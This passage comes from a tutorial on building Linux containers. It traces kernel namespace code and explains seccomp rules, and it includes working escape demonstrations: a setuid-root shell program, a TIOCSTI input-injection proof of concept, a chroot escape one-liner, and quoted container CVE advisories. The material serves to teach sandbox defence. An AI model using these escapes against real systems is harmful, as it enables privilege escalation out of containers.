 * @ns: ipc namespace
 * @ipcp: ipc permission set
 * @ops: the actual security routine to call
 * @params: its parameters
 *
 * This routine is called by sys_msgget(), sys_semget() and sys_shmget()
 * when the key is not IPC_PRIVATE and that key already exists in the
 * ds IDR.
 *
 * On success, the ipc id is returned.
 *
 * It is called with ipc_ids.rwsem and ipcp->lock held.
 */
static int ipc_check_perms(struct ipc_namespace *ns,
			   struct kern_ipc_perm *ipcp,
			   const struct ipc_ops *ops,
			   struct ipc_params *params)
{
	int err;

	if (ipcperms(ns, ipcp, params->flg))
		err = -EACCES;
	else {
		err = ops->associate(ipcp, params->flg);
		if (!err)
			err = ipcp->id;
	}

	return err;
}

which is called by `ipcget_public`.

ipc/util.c:323@c8d2bc

/**
 * ipcget_public - get an ipc object or create a new one
 * @ns: ipc namespace
 * @ids: ipc identifier set
 * @ops: the actual creation routine to call
 * @params: its parameters
 *
 * This routine is called by sys_msgget, sys_semget() and sys_shmget()
 * when the key is not IPC_PRIVATE.
 * It adds a new entry if the key is not found and does some permission
 * / security checkings if the key is found.
 *
 * On success, the ipc id is returned.
 */
static int ipcget_public(struct ipc_namespace *ns, struct ipc_ids *ids,
		const struct ipc_ops *ops, struct ipc_params *params)
{
	struct kern_ipc_perm *ipcp;
	int flg = params->flg;
	int err;

	/*
	 * Take the lock as a writer since we are potentially going to add
	 * a new entry + read locks are not "upgradable"
	 */
	down_write(&ids->rwsem);
	ipcp = ipc_findkey(ids, params->key);
	if (ipcp == NULL) {
		/* key not used */
		if (!(flg & IPC_CREAT))
			err = -ENOENT;
		else
			err = ops->getnew(ns, params);
	} else {
		/* ipc object has been locked by ipc_findkey() */

		if (flg & IPC_CREAT && flg & IPC_EXCL)
			err = -EEXIST;
		else {
			err = 0;
			if (ops->more_checks)
				err = ops->more_checks(ipcp, params);
			if (!err)
				/*
				 * ipc_check_perms returns the IPC id on
				 * success
				 */
				err = ipc_check_perms(ns, ipcp, ops, params);
		}
		ipc_unlock(ipcp);
	}
	up_write(&ids->rwsem);

	return err;
}

`ipcget_public` handles both creation and access for non-`IPC_PRIVATE` requests. It **doesn't** check the IPC namespace for existing IPC objects. It's called by `ipcget` if `IPC_PRIVATE` is not set:

ipc/util.c:625@c8d2bc

/**
 * ipcget - Common sys_*get() code
 * @ns: namespace
 * @ids: ipc identifier set
 * @ops: operations to be called on ipc object creation, permission checks
 *       and further checks
 * @params: the parameters needed by the previous operations.
 *
 * Common routine called by sys_msgget(), sys_semget() and sys_shmget().
 */
int ipcget(struct ipc_namespace *ns, struct ipc_ids *ids,
			const struct ipc_ops *ops, struct ipc_params *params)
{
	if (params->key == IPC_PRIVATE)
		return ipcget_new(ns, ids, ops, params);
	else
		return ipcget_public(ns, ids, ops, params);
}

which in turn is called by the `shmget`, `semget`, and `msgget` syscalls.

But `shmget`, `semget`, and `msgget` are all part of the System V IPC set, and in order to use them you need to call `shmat`, `semop` / `semtimedop`, and `msgsnd` / `msgrcv`, which all only work for objects in the namespace:

`shmat` immediately calls `do_shmat`, which is listed above:

ipc/shm.c:1249@c8d2bc

SYSCALL_DEFINE3(shmat, int, shmid, char __user *, shmaddr, int, shmflg)
{
	unsigned long ret;
	long err;

	err = do_shmat(shmid, shmaddr, shmflg, &ret, SHMLBA);
	if (err)
		return err;
	force_successful_syscall_return();
	return (long)ret;
}

`semop` calls `semtimedop`:

ipc/sem.c:20151@c8d2bc

SYSCALL_DEFINE3(semop, int, semid, struct sembuf __user *, tsops,
		unsigned, nsops)
{
	return sys_semtimedop(semid, tsops, nsops, NULL);
}

ipc/sem.c:1816@c8d2bc

SYSCALL_DEFINE4(semtimedop, int, semid, struct sembuf __user *, tsops,
		unsigned, nsops, const struct timespec __user *, timeout)
{
	/* ... */
	ns = current->nsproxy->ipc_ns;

	/* ...
	   allocate some space for things.
	   ...
	*/

	sma = sem_obtain_object_check(ns, semid);

	/* ... */
}

`msgsnd` and `msgrcv` immediately call `do_msgsnd` and `do_msgrcv`, which are also listed above:

ipc/msg.c:743@c8d2bc

SYSCALL_DEFINE4(msgsnd, int, msqid, struct msgbuf __user *, msgp, size_t, msgsz,
		int, msgflg)
{
	long mtype;

	if (get_user(mtype, &msgp->mtype))
		return -EFAULT;
	return do_msgsnd(msqid, mtype, msgp->mtext, msgsz, msgflg);
}

ipc/msg.c:1004@c8d2bc

SYSCALL_DEFINE5(msgrcv, int, msqid, struct msgbuf __user *, msgp, size_t, msgsz,
		long, msgtyp, int, msgflg)
{
	return do_msgrcv(msqid, msgp, msgsz, msgtyp, msgflg, do_msg_fill);
}
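
To make the userspace side of that concrete, here's a small sketch of the get / send / receive sequence for a message queue. The `demo_msg` layout and the `msg_roundtrip` helper are made up for illustration. Every call after `msgget` takes the queue id and so goes through the namespace-scoped lookups listed above:

```c
#include <stdio.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

/* Hypothetical message layout: the mandatory type, then a payload. */
struct demo_msg {
	long mtype;
	char mtext[32];
};

/*
 * Create a private queue, push one message through it, remove the queue.
 * Returns 1 if the payload round-trips, 0 if it differs, and -1 if any
 * syscall fails (for example if SysV IPC is unavailable).
 */
static int msg_roundtrip(const char *text)
{
	struct demo_msg out = { .mtype = 1 }, in = { 0 };
	int ret = -1;
	int id = msgget(IPC_PRIVATE, IPC_CREAT | 0600);

	if (id == -1)
		return -1;
	snprintf(out.mtext, sizeof(out.mtext), "%s", text);
	if (msgsnd(id, &out, sizeof(out.mtext), IPC_NOWAIT) == 0
	    && msgrcv(id, &in, sizeof(in.mtext), 1, IPC_NOWAIT) != -1)
		ret = !strcmp(in.mtext, out.mtext);
	msgctl(id, IPC_RMID, NULL); /* always remove the queue */
	return ret;
}
```

An id obtained in one IPC namespace should be meaningless to `msgsnd` or `msgrcv` in another, since both resolve it against `current`'s namespace.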

We can see that they’re effectively namespaced:

enumerate_net_devs.c
/* Local Variables: */
/* compile-command: "gcc -Wall -Werror -static enumerate_net_devs.c \*/
/*                   -o enumerate_net_devs" */
/* End: */
#include <stdio.h>
#include <net/if.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>

int main (int argc, char **argv)
{
	int sock = socket(PF_LOCAL, SOCK_SEQPACKET, 0);
	for (size_t i = 0; i < 100; i++) {
		struct ifreq req = { .ifr_ifindex = i };
		if (!ioctl(sock, SIOCGIFNAME, &req))
			printf("%3lu: %s\n", i, req.ifr_name);
	}
	return 0;
}

[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./enumerate_net_devs
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.7npCN7...done.
=> trying a user namespace...writing /proc/1750/uid_map...writing /proc/1750/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
  1: lo
=> cleaning cgroups...done.

Network device data structures are created inside of the kernel, not in userspace with `mknod`.

For example, `ip link add dummy0 type dummy` does this:

- Opens a `NETLINK_ROUTE` netlink socket.
- Sends a `RTM_NEWLINK` message over it.
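
As a rough sketch of what that message looks like on the wire, the code below only builds the request in a buffer and doesn't send it. The `newlink_req` struct and both helper names are my own, there's no bounds checking on the attribute area, and the real `ip` sets more fields than this:

```c
#include <string.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>

/* Hypothetical request layout: header, ifinfomsg, then attribute space. */
struct newlink_req {
	struct nlmsghdr hdr;
	struct ifinfomsg ifi;
	char attrs[128];
};

/* Append one rtattr at the end of the message and return it. */
static struct rtattr *add_attr(struct nlmsghdr *hdr, unsigned short type,
			       const void *data, unsigned short len)
{
	struct rtattr *rta =
		(struct rtattr *)((char *)hdr + NLMSG_ALIGN(hdr->nlmsg_len));

	rta->rta_type = type;
	rta->rta_len = RTA_LENGTH(len);
	if (len)
		memcpy(RTA_DATA(rta), data, len);
	hdr->nlmsg_len = NLMSG_ALIGN(hdr->nlmsg_len) + RTA_ALIGN(rta->rta_len);
	return rta;
}

/* Fill req with an RTM_NEWLINK request for a "dummy" device. */
static void build_dummy_newlink(struct newlink_req *req, const char *ifname)
{
	memset(req, 0, sizeof(*req));
	req->hdr.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg));
	req->hdr.nlmsg_type = RTM_NEWLINK;
	req->hdr.nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK;
	req->ifi.ifi_family = AF_UNSPEC;

	add_attr(&req->hdr, IFLA_IFNAME, ifname, strlen(ifname) + 1);
	/* IFLA_LINKINFO is a nested attribute that wraps IFLA_INFO_KIND. */
	struct rtattr *linkinfo = add_attr(&req->hdr, IFLA_LINKINFO, NULL, 0);
	add_attr(&req->hdr, IFLA_INFO_KIND, "dummy", strlen("dummy"));
	linkinfo->rta_len = (char *)req + req->hdr.nlmsg_len - (char *)linkinfo;
}
```

Actually sending it would mean writing `hdr.nlmsg_len` bytes to a `socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE)`. Nothing in the request names a device node or a major / minor number, only a name and a driver kind.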

Code in net/core/rtnetlink.c@c8d2bc dispatches the message to `rtnl_create_link`, which does this:

net/core/rtnetlink.c:2239@c8d2bc

struct net_device *rtnl_create_link(struct net *net,
	const char *ifname, unsigned char name_assign_type,
	const struct rtnl_link_ops *ops, struct nlattr *tb[])
{
	int err;
	struct net_device *dev;
	unsigned int num_tx_queues = 1;
	unsigned int num_rx_queues = 1;

	/* ... */

	err = -ENOMEM;
	dev = alloc_netdev_mqs(ops->priv_size, ifname, name_assign_type,
			       ops->setup, num_tx_queues, num_rx_queues);
	if (!dev)
		goto err;

	/* ... */
}

`alloc_netdev_mqs` calls the `setup` function:

/**
 *	alloc_netdev_mqs - allocate network device
 *	@sizeof_priv:		size of private data to allocate space for
 *	@name:			device name format string
 *	@name_assign_type:	origin of device name
 *	@setup:			callback to initialize device
 *	@txqs:			the number of TX subqueues to allocate
 *	@rxqs:			the number of RX subqueues to allocate
 *
 *	Allocates a struct net_device with private data area for driver use
 *	and performs basic initialization.  Also allocates subqueue structs
 *	for each queue on the device.
 */
struct net_device *alloc_netdev_mqs(int sizeof_priv, const char *name,
		unsigned char name_assign_type,
		void (*setup)(struct net_device *),
		unsigned int txqs, unsigned int rxqs)
{
	struct net_device *dev;
	size_t alloc_size;
	struct net_device *p;

	/* ... */

	setup(dev);

	/* ... */
}

`dummy_setup` gets called, since it’s the `.setup` of a `rtnl_link_ops`:

drivers/net/dummy.c:170@c8d2bc

static struct rtnl_link_ops dummy_link_ops __read_mostly = {
	.kind		= DRV_NAME,
	.setup		= dummy_setup,
	.validate	= dummy_validate,
};

drivers/net/dummy.c:137@c8d2bc

static void dummy_setup(struct net_device *dev)
{
	ether_setup(dev);

	/* Initialize the device structure. */
	dev->netdev_ops = &dummy_netdev_ops;
	dev->ethtool_ops = &dummy_ethtool_ops;
	dev->destructor = free_netdev;

	/* Fill in device structure with ethernet-generic values. */
	dev->flags |= IFF_NOARP;
	dev->flags &= ~IFF_MULTICAST;
	dev->priv_flags |= IFF_LIVE_ADDR_CHANGE | IFF_NO_QUEUE;
	dev->features	|= NETIF_F_SG | NETIF_F_FRAGLIST;
	dev->features	|= NETIF_F_ALL_TSO | NETIF_F_UFO;
	dev->features	|= NETIF_F_HW_CSUM | NETIF_F_HIGHDMA | NETIF_F_LLTX;
	dev->features	|= NETIF_F_GSO_ENCAP_ALL;
	dev->hw_features |= dev->features;
	dev->hw_enc_features |= dev->features;
	eth_hw_addr_random(dev);
}

In other words, there’s no equivalent of userspace major / minor device numbers for network devices.

kernel/ptrace.c:1079@c8d2bc:

SYSCALL_DEFINE4(ptrace, long, request, long, pid, unsigned long, addr,
		unsigned long, data)
{
	struct task_struct *child;
	long ret;

	if (request == PTRACE_TRACEME) {
		ret = ptrace_traceme();
		if (!ret)
			arch_ptrace_attach(current);
		goto out;
	}

	child = ptrace_get_task_struct(pid);
	if (IS_ERR(child)) {
		ret = PTR_ERR(child);
		goto out;
	}
	[...]
}

which calls `ptrace_get_task_struct`:

kernel/ptrace.c:1060@c8d2bc:

static struct task_struct *ptrace_get_task_struct(pid_t pid)
{
	struct task_struct *child;

	rcu_read_lock();
	child = find_task_by_vpid(pid);
	if (child)
		get_task_struct(child);
	rcu_read_unlock();

	if (!child)
		return ERR_PTR(-ESRCH);
	return child;
}

…which in turn calls `find_task_by_vpid`:

kernel/pid.c:459@c8d2bc:

struct task_struct *find_task_by_vpid(pid_t vnr)
{
	return find_task_by_pid_ns(vnr, task_active_pid_ns(current));
}

which calls `find_task_by_pid_ns`:

kernel/pid.c:452@c8d2bc:

struct task_struct *find_task_by_pid_ns(pid_t nr, struct pid_namespace *ns)
{
	RCU_LOCKDEP_WARN(!rcu_read_lock_held(),
			 "find_task_by_pid_ns() needs rcu_read_lock() protection");
	return pid_task(find_pid_ns(nr, ns), PIDTYPE_PID);
}

which, finally, calls `find_pid_ns`. You can see here that it only finds a `struct pid *` that shares the pid namespace of the current task.

kernel/pid.c:366@c8d2bc:

struct pid *find_pid_ns(int nr, struct pid_namespace *ns)
{
	struct upid *pnr;

	hlist_for_each_entry_rcu(pnr,
			&pid_hash[pid_hashfn(nr, ns)], pid_chain)
		if (pnr->nr == nr && pnr->ns == ns)
			return container_of(pnr, struct pid,
					numbers[ns->level]);

	return NULL;
}
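
The important part is that the lookup key is the pair (number, namespace), not the number alone. Here's a toy user-space model of that. The `model_` types and function are invented for illustration, and a linear scan stands in for the kernel's hash table:

```c
#include <stddef.h>

/* Stand-ins for struct pid_namespace and struct upid. */
struct model_ns {
	int level;
};

struct model_upid {
	int nr;
	const struct model_ns *ns;
};

/*
 * Toy version of find_pid_ns(): an entry matches only if both the
 * number and the namespace pointer match.
 */
static const struct model_upid *
model_find_pid_ns(const struct model_upid *table, size_t n,
		  int nr, const struct model_ns *ns)
{
	for (size_t i = 0; i < n; i++)
		if (table[i].nr == nr && table[i].ns == ns)
			return &table[i];
	return NULL;
}
```

In this model, a process that is pid 4242 on the host is simply not found when looked up as 4242 from a child namespace, which is why `ptrace` from inside the container can't name it.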

The `kill` syscalls call `kill_something_info`, which follows a dense call chain (`kill_pid_info` -> `group_send_sig_info` -> `do_send_sig_info` -> `send_sig_info` -> `send_signal` -> `__send_signal`) to eventually end up in `__send_signal`, which does respect user namespaces:

kernel/signal.c:972@c8d2bc

static int __send_signal(int sig, struct siginfo *info, struct task_struct *t,
			int group, int from_ancestor_ns)
{
	/* ... */
	q = __sigqueue_alloc(sig, t, GFP_ATOMIC | __GFP_NOTRACK_FALSE_POSITIVE,
		override_rlimit);
	if (q) {
		list_add_tail(&q->list, &pending->list);
		switch ((unsigned long) info) {
		case (unsigned long) SEND_SIG_NOINFO:
			q->info.si_signo = sig;
			q->info.si_errno = 0;
			q->info.si_code = SI_USER;
			q->info.si_pid = task_tgid_nr_ns(current,
							task_active_pid_ns(t));
			q->info.si_uid = from_kuid_munged(current_user_ns(), current_uid());
			break;
		case (unsigned long) SEND_SIG_PRIV:
			q->info.si_signo = sig;
			q->info.si_errno = 0;
			q->info.si_code = SI_KERNEL;
			q->info.si_pid = 0;
			q->info.si_uid = 0;
			break;
		default:
			copy_siginfo(&q->info, info);
			if (from_ancestor_ns)
				q->info.si_pid = 0;
			break;
		}

		userns_fixup_signal_uid(&q->info, t);
	}
	/*...*/
}
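
You can look at the `si_pid` and `si_uid` fields that end up in the queued siginfo from userspace. This sketch sends a signal to itself and reads the result back with `sigwaitinfo`. The helper name `self_signal_info` is mine:

```c
#define _GNU_SOURCE
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>

/*
 * Send SIGUSR1 to ourselves and fetch the siginfo the kernel queued.
 * Returns 0 on success, -1 if any call fails.
 */
static int self_signal_info(siginfo_t *info)
{
	sigset_t set, old;
	int ret = 0;

	sigemptyset(&set);
	sigaddset(&set, SIGUSR1);
	/* Block the signal so it stays pending until sigwaitinfo(). */
	if (sigprocmask(SIG_BLOCK, &set, &old))
		return -1;
	if (kill(getpid(), SIGUSR1) || sigwaitinfo(&set, info) == -1)
		ret = -1;
	sigprocmask(SIG_SETMASK, &old, NULL);
	return ret;
}
```

For a signal sent with `kill`, `si_code` is `SI_USER` and `si_pid` / `si_uid` describe the sender as seen from the receiver's namespaces. Here the sender and receiver are the same process, so they match `getpid()` and `getuid()`.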

Quoting man 7 capabilities, again:

	CAP_SETGID
		Make  arbitrary  manipulations   of  process  GIDs  and
		supplementary GID  list; forge GID when  passing socket
		credentials via  UNIX domain sockets; write  a group ID
		mapping in a user namespace (see user_namespaces(7)).
	CAP_SETUID
		Make   arbitrary   manipulations    of   process   UIDs
		(setuid(2),  setreuid(2),  setresuid(2),  setfsuid(2));
		forge  UID when  passing  socket  credentials via  UNIX
		domain  sockets; write  a  user ID  mapping  in a  user
		namespace (see user_namespaces(7)).

Brad Spengler’s “False Boundaries and Arbitrary Code Execution”, again

CAP_SYS_CHROOT: generic: From Julien Tinnes/Chris Evans: if you have write access to the same filesystem as a suid root binary, set up a chroot environment with a backdoored libc and then execute a hardlinked suid root binary within your chroot and gain full root privileges through your backdoor

man 2 chroot:

This call does not change the current working directory, so that after the call ‘.’ can be outside the tree rooted at ‘/’. In particular, the superuser can escape from a “chroot jail” by doing:
mkdir foo; chroot foo; cd ..

There have been issues with unpacking containers in Docker and LXC:

Docker 1.3.2 - Security Advisory {24 Nov 2014}

=====================================================
[CVE-2014-6407] Archive extraction allowing host privilege escalation
=====================================================
Severity: Critical
Affects: Docker up to 1.3.1

The Docker engine, up to and including version 1.3.1, was vulnerable to
extracting files to arbitrary paths on the host during ‘docker pull’ and
‘docker load’ operations. This was caused by symlink and hardlink
traversals present in Docker's image extraction. This vulnerability could
be leveraged to perform remote code execution and privilege escalation.

Docker 1.6.1 - Security Advisory {150507}

====================================================================

[CVE-2015-3629] Symlink traversal on container respawn allows local
privilege escalation

====================================================================

Libcontainer version 1.6.0 introduced changes which facilitated a mount
namespace breakout upon respawn of a container. This allowed malicious
images to write files to the host system and escape containerization.

Security issues in LXC (CVE-2015-1331 and CVE-2015-1334), from Tyler Hicks

* Roman Fiedler discovered a directory traversal flaw that allows
  arbitrary file creation as the root user. A local attacker must set up
  a symlink at /run/lock/lxc/var/lib/lxc/<CONTAINER>, prior to an admin
  ever creating an LXC container on the system. If an admin then creates
  a container with a name matching <CONTAINER>, the symlink will be
  followed and LXC will create an empty file at the symlink's target as
  the root user.
  - CVE-2015-1331
  - Affects LXC 1.0.0 and higher
  - https://launchpad.net/bugs/1470842
  - https://github.com/lxc/lxc/commit/72cf81f6a3404e35028567db2c99a90406e9c6e6 (master)
  - https://github.com/lxc/lxc/commit/61ecf69d7834921cc078e14d1b36c459ad8f91c7 (stable-1.1)
  - https://github.com/lxc/lxc/commit/f547349ea7ef3a6eae6965a95cb5986cd921bd99 (stable-1.0)

* Roman Fiedler discovered a flaw that allows processes intended to be
  run inside of confined LXC containers to escape their AppArmor or
  SELinux confinement. A malicious container can create a fake proc
  filesystem, possibly by mounting tmpfs on top of the container's
  /proc, and wait for a lxc-attach to be ran from the host environment.
  lxc-attach incorrectly trusts the container's
  /proc/PID/attr/{current,exec} files to set up the AppArmor profile and
  SELinux domain transitions which may result in no confinement being
  used.
  - CVE-2015-1334
  - Affects LXC 0.9.0 and higher
  - https://launchpad.net/bugs/1475050
  - https://github.com/lxc/lxc/commit/5c3fcae78b63ac9dd56e36075903921bd9461f9e (master)
  - https://github.com/lxc/lxc/commit/659e807c8dd1525a5c94bdecc47599079fad8407 (stable-1.1)
  - https://github.com/lxc/lxc/commit/15ec0fd9d490dd5c8a153401360233c6ee947c24 (stable-1.0)

Tyler

These are all really interesting! I want to write more about them.

The Docker seccomp policy doesn’t include an explicit blacklist, which makes it a little hard to follow, so I wrote code to find it.

    #!/usr/bin/env python3

    import gzip
    import requests
    import re
    import sys

    url = "https://raw.githubusercontent.com/docker/docker/5ff21add06ce0e502b41a194077daad311901996/profiles/seccomp/default.json"

    conditional = set()
    allowed = set()
    disallowed = set()

    for entry in requests.get(url).json()["syscalls"]:
        if entry["args"]:
            conditional |= set(entry["names"])
        else:
            allowed |= set(entry["names"])

    manpage = "/usr/share/man/man2/syscalls.2.gz"

    with gzip.open(manpage, "r") as f:
        ready = False
        for _line in f:
            line = _line.decode("utf-8")
            # table end
            if ready and line == ".TE\n":
                break
            match = re.match(r"\\fB(.+?)\\fP(.+)", line)
            if match:
                if match.group(1) == "System call":
                    ready = True
                elif (match.group(1) not in allowed
                      and match.group(1) not in conditional):
                    disallowed.add(match.group(1))

    print("Conditionally allowed:")
    for c in sorted(conditional):
        sys.stdout.write("~%s~, " % c)
    print("\n\nDisallowed:")
    for d in sorted(disallowed):
        sys.stdout.write("~%s~, " % d)
    sys.stdout.write("\n")

Conditionally allowed: `clone`, `personality`

Disallowed: `_sysctl`, `add_key`, `alloc_hugepages`, `bdflush`, `clock_adjtime`, `clock_settime`, `create_module`, `free_hugepages`, `get_kernel_syms`, `get_mempolicy`, `getpagesize`, `kern_features`, `kexec_file_load`, `kexec_load`, `keyctl`, `mbind`, `migrate_pages`, `move_pages`, `nfsservctl`, `nice`, `oldfstat`, `oldlstat`, `oldolduname`, `oldstat`, `olduname`, `pciconfig_iobase`, `pciconfig_read`, `pciconfig_write`, `perfctr`, `perfmonctl`, `pivot_root`, `ppc_rtas`, `preadv2`, `pwritev2`, `quotactl`, `readdir`, `request_key`, `set_mempolicy`, `setup`, `sgetmask`, `sigaction`, `signal`, `sigpending`, `sigprocmask`, `sigsuspend`, `spu_create`, `spu_run`, `ssetmask`, `subpage_prot`, `swapoff`, `swapon`, `sync_file_range2`, `sysfs`, `uselib`, `userfaultfd`, `ustat`, `utrap_install`, `vm86`, `vm86old`

self_setuid.c
/* -*- compile-command: "gcc -Wall -Werror -static self_setuid.c -o self_setuid" -*- */
#define _GNU_SOURCE
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

int main (int argc, char **argv)
{
	if (argc == 2 && !strcmp(argv[1], "shell")) {
		if (setresuid(0, 0, 0)) {
			fprintf(stderr, "++ setresuid(0, 0, 0) failed: %m\n");
			return 1;
		}
		return system("sh");
	} else {
		if (chown(argv[0], 0, 0)) {
			fprintf(stderr, "++ chown failed: %m\n");
			return 1;
		}
		int self_fd = -1;
		/* open() reports failure with -1, not 0. */
		if ((self_fd = open(argv[0], O_RDONLY)) == -1) {
			fprintf(stderr, "++ open failed: %m\n");
			return 1;
		}
		if (chmod(argv[0], S_ISUID | S_IXOTH)
		    && fchmod(self_fd, S_ISUID | S_IXOTH)
		    && fchmodat(AT_FDCWD, argv[0], S_ISUID | S_IXOTH, 0)) {
			fprintf(stderr, "++ chmod / fchmod / fchmodat failed: %m\n");
			close(self_fd);
			return 1;
		}
		close(self_fd);
		return 0;
	}
}
allow_chmod.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..b471a69 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -151,18 +151,6 @@ int syscalls()
 	scmp_filter_ctx ctx = NULL;
 	fprintf(stderr, "=> filtering syscalls...");
 	if (!(ctx = seccomp_init(SCMP_ACT_ALLOW))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(chmod), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(chmod), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmod), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmod), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmodat), 1,
-				SCMP_A2(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmodat), 1,
-				SCMP_A2(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(unshare), 1,
 				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(clone), 1,

[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./self_setuid
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.EXwjdL...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ chmod / fchmod / fchmodat failed: Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_chmod -m . -u 0 -c ./self_setuid
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.35HO0W...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ ./self_setuid shell
sh-4.3# whoami
root
sh-4.3# exit
[lizzie@empress l-c-i-500-l]$ rm ./self_setuid

I heard about this pretty recently because of CVE-2016-7545, an SELinux bug:

CVE-2016-7545 -- SELinux sandbox escape from Federico Bento

Hi,

When executing a program via the SELinux sandbox, the nonpriv session
can escape to the parent session by using the TIOCSTI ioctl to push
characters into the terminal's input buffer, allowing an attacker to
escape the sandbox.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

int main()
{
     char *cmd = "id\n";
     while(*cmd)
      ioctl(0, TIOCSTI, cmd++);
     execlp("/bin/id", "id", NULL);
}

$ gcc test.c -o test
$ /bin/sandbox ./test
id
uid=1000 gid=1000 groups=1000
context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
$ id    <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Bug report:
https://bugzilla.redhat.com/show_bug.cgi?id=1378577

Upstream fix:
https://marc.info/?l=selinux&m=147465160112766&w=2
https://marc.info/?l=selinux&m=147466045909969&w=2
https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379

Federico Bento.
tiocsti.c
/* -*- compile-command: "gcc -Wall -Werror -static tiocsti.c -o tiocsti" -*- */
/* adapted from http://www.openwall.com/lists/oss-security/2016/09/25/1 */
#include <unistd.h>
#include <sys/ioctl.h>
#include <stdio.h>

int main()
{
     for (char *cmd = "id\n"; *cmd; cmd++) {
	     if (ioctl(STDIN_FILENO, TIOCSTI, cmd)) {
		     fprintf(stderr, "++ ioctl failed: %m\n");
		     return 1;
	     }
     }
     return 0;
}
allow_tiocsti.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..5fb25bd 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -167,8 +167,6 @@ int syscalls()
 				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(clone), 1,
 				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(ioctl), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, TIOCSTI, TIOCSTI))
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(keyctl), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(add_key), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(request_key), 0)
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./tiocsti 
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.P5QATt...done.
=> trying a user namespace...writing /proc/1819/uid_map...writing /proc/1819/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ ioctl failed: Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_tiocsti -m . -u 0 -c ./tiocsti 
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
